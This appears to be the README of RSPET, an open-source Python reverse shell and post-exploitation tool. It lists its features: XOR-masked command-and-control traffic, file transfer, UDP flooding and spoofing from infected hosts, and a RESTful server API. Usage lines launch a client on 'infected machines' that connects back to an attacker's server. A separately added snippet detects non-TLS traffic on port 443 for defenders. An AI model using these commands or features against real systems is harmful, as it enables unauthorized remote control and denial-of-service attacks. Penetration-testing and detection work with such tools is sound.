RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
DISCLAIMER: This software is provided for educational and PenTesting purposes and as a proof of concept. The developer(s) do not endorse, incite or in any other way support unauthorised computer access and network disruption.
NOTE: The min folder has been removed. The added overhead of maintaining two versions led to min not receiving bug-fixes and important updates. If there is interest, both in using and maintaining, a more bare-bone and simplistic version, a new branch will be created to host it.
Current Version: v0.2.7
Follow: @TheRSPET on Twitter for updates.
Documentation : rspet.readthedocs.io
- Remote Command Execution
- Traffic masking (XORed instead of cleartext); for better results use port 443[1]
- Built-in File/Binary transfer (both ways) over the masked traffic
- Built-in UDP Flooding tool
- Built-in UDP Spoofing tool[2]
- Multiple/All Hosts management; order File/Binary transfer and UDP Flood from Multiple/All connected Hosts
- Modular Code Design to allow easy customization
- Client script is tested and is compatible with PyInstaller (can be made into .exe)[3]
- Full server side plug-in support.[4]
- RESTful API for the Server Module.
*[1] The idea for XORing as well as the skeleton for the client came from primalsecurity.net, so if you like this pack of scripts you'll probably love what they do.
*[2] UDP Spoofing uses RAW_SOCKETS, so in order to utilize it, the client has to run on an OS that supports RAW_SOCKETS (most Unix-based) and with root privileges. Finally, most ISPs have implementations in place that will either drop or re-structure spoofed packets.
*[3] Again, check primalsecurity.net's perfect blog post about producing an .exe.
*[4] Detailed documentation on creating plugins is available in the Online Documentation!
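A defender-side check for the traffic-masking feature above, as an added example that is not part of RSPET: XOR-masked bytes sent to TCP port 443 do not form a TLS record, so the first client payload of each flow can be tested for a ClientHello header. The flow records, the single-byte key 0x41 and the function names are constructed for illustration (Python 3).

```python
import struct

MAX_RECORD_LEN = 2**14 + 2048  # largest TLS record fragment length (RFC 5246)


def looks_like_client_hello(payload):
    """True if payload starts with a TLS handshake record holding a ClientHello."""
    if len(payload) < 6:
        return False
    ctype, major, minor, length = struct.unpack("!BBBH", payload[:5])
    return (ctype == 22                      # record type: handshake
            and major == 3 and minor <= 4    # SSL 3.0 .. TLS 1.3 record versions
            and 0 < length <= MAX_RECORD_LEN
            and payload[5] == 1)             # handshake type: client_hello


def xor_mask(data, key):
    """Single-byte XOR, used only to build the constructed sample below."""
    return bytes(b ^ key for b in data)


def flag_non_tls(flows, port=443):
    """Return ids of flows to `port` whose first client payload is not a ClientHello."""
    return [f["id"] for f in flows
            if f["dport"] == port
            and not looks_like_client_hello(f["first_payload"])]


# Constructed sample flows (not captured traffic); the key 0x41 is an assumption.
SAMPLE_FLOWS = [
    # Start of a plausible ClientHello record: type 22, version 3.1, length 512
    {"id": "flow-1", "dport": 443,
     "first_payload": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03" + bytes(32)},
    # XOR-masked text sent to 443: the header bytes are not a TLS record
    {"id": "flow-2", "dport": 443,
     "first_payload": xor_mask(b"example output line\n", 0x41)},
    # Cleartext HTTP on 443 is flagged by the same test
    {"id": "flow-3", "dport": 443,
     "first_payload": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"},
    # Same masked bytes on another port: outside the scope of this check
    {"id": "flow-4", "dport": 8080,
     "first_payload": xor_mask(b"example output line\n", 0x41)},
]

if __name__ == "__main__":
    print(flag_non_tls(SAMPLE_FLOWS))
```

A hit is a triage signal rather than an attribution: any non-TLS protocol on port 443 is flagged the same way.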
- rspet_server.py is situated at the attacker's machine and running to accept connections
- rspet_client.py is situated in the infected machine(s) and will initiate the connection and wait for input.
- Server:
  python rspet_server.py (max_connections)
  max_connections defaults to 5 if left blank
- RESTful API:
  - Install Flask with pip (only the first time)
    pip2 install Flask
  - Start the API
    python rspet_server_api.py
- Client:
  python rspet_client.py server_ip
Many changes can be made to fit individual needs.
As always, if you have any suggestions, bug reports or complaints, feel free to contact me.
A list of Distros that contain RSPET
- BlackArch Linux (as of version 2016.04.28)
- ArchStrike

- Fix logic bug where if a direct command to Host OS has no output Server displays command not recognized
- Fix logic bug where if execution of a direct command to Host OS is perpetual the Server deadlocks
- Add client version and type (min or full) as a property when client connects and at List_Hosts
- Replace XORing with private key encryption (with random private key generated and traded upon connection)
  - Must find a way that does not require any extra installation on the client
  - Add a NoSQL (at least server-side) to store and handle traded keys
- Add public key encryption in order to:
  - Encrypt the exchange of the private key
  - Verify the "authenticity" of clients
- Add client update mechanism (initial thought was the use of execv but it acts up)
- Add a plugin system to client (a more compact one)
- Add remote installation of plugins to client
- Add installed plugins report from client to server
- Add UDP Reflection functionality
- Provide more settings via config file
- Re-introduce multithreading when handling multiple hosts.
- Make commands available with 'Tab' automatically generated based on loaded plugins.
- Fix logical bug when deleting a client. (Client still shows up on List_Hosts)
- Create comprehensive plug-in creation guide.
This project is following Google's Python Styleguide with a minor variation on the use of whitespaces to align ":" tokens.
This project is open for contributors. If you have implemented a new feature, or maybe an improvement to the current code, feel free to open a pull request. If you want to suggest a new feature, open an issue. Additionally, Testers are needed to run a few standard scenarios (and a few of their own maybe) to decrease the chance a bug slips into a new version. Should there be any interest about testing, a beta branch will be created (where code to be tested will be uploaded) along with a list of scenarios. For a full guide on contribution opportunities and guides, check out the "Contributing" chapter on RSPET's Online Documentation.
dzervas -- Code (Server OO-redesign, Server Plug-in system implementation, bug reports, bug fixes)
MIT